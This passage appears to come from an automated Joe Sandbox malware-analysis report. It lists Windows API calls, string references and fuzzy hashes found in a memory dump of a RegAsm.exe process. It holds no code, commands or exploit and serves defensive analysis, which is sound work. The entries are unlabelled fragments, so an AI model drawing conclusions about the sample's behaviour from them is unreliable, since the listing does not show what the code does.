                                                                                                                                        • API ID: memset$ByteCharMultiWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 290601579-0
                                                                                                                                        • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                        • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                        • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                                                                                                        • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                        • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                          • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                          • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                        • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                        • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                        • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                        • String ID: strings
                                                                                                                                        • API String ID: 3166385802-3030018805
                                                                                                                                        • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                        • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                        • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                        • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                        APIs
                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                        • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                        • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                        • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                        • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                        • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                        • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1331804452-0
                                                                                                                                        • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                        • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                        • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                        • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                        • <%s>, xrefs: 004100A6
                                                                                                                                        • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$_snwprintf
                                                                                                                                        • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                        • API String ID: 3473751417-2880344631
                                                                                                                                        • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                        • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                        • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                        • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wcscat$_snwprintfmemset
                                                                                                                                        • String ID: %2.2X
                                                                                                                                        • API String ID: 2521778956-791839006
                                                                                                                                        • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                        • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                        • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                        • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                        APIs
                                                                                                                                        • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                        • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                        • free.MSVCRT ref: 0041822B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PathTemp$free
                                                                                                                                        • String ID: %s\etilqs_$etilqs_
                                                                                                                                        • API String ID: 924794160-1420421710
                                                                                                                                        • Opcode ID: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                                        • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                        • Opcode Fuzzy Hash: 56ec1b67c7de480e9defb5870fd9659a5ac2ef2fb157f5962cb97a1bc3191f52
                                                                                                                                        • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                        • memset.MSVCRT ref: 004450CD
                                                                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                          • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                          • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1471605966-0
                                                                                                                                        • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                        • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                        • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                        • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 004100FB
                                                                                                                                        • memset.MSVCRT ref: 00410112
                                                                                                                                          • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                          • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                        • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                        • String ID: </%s>
                                                                                                                                        • API String ID: 3400436232-259020660
                                                                                                                                        • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                        • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                        • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                        • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                          • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                                        • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                        • String ID: MS Sans Serif
                                                                                                                                        • API String ID: 210187428-168460110
                                                                                                                                        • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                        • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                        • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                        • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 00412057
                                                                                                                                          • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                        • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                        • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                        • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3550944819-0
                                                                                                                                        • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                        • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                        • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                        • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                        APIs
                                                                                                                                        • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                        • free.MSVCRT ref: 0040B201
                                                                                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                        • free.MSVCRT ref: 0040B224
                                                                                                                                        • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memcpy$mallocwcslen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 726966127-0
                                                                                                                                        • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                                                                        • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                        • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                                                                                                                                        • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                        APIs
                                                                                                                                        • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                        • free.MSVCRT ref: 0040B0FB
                                                                                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                        • free.MSVCRT ref: 0040B12C
                                                                                                                                        • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free$memcpy$mallocstrlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3669619086-0
                                                                                                                                        • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                                                                        • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                        • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                                                                                                                                        • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1033339047-0
                                                                                                                                        • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                        • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                        • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                        • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49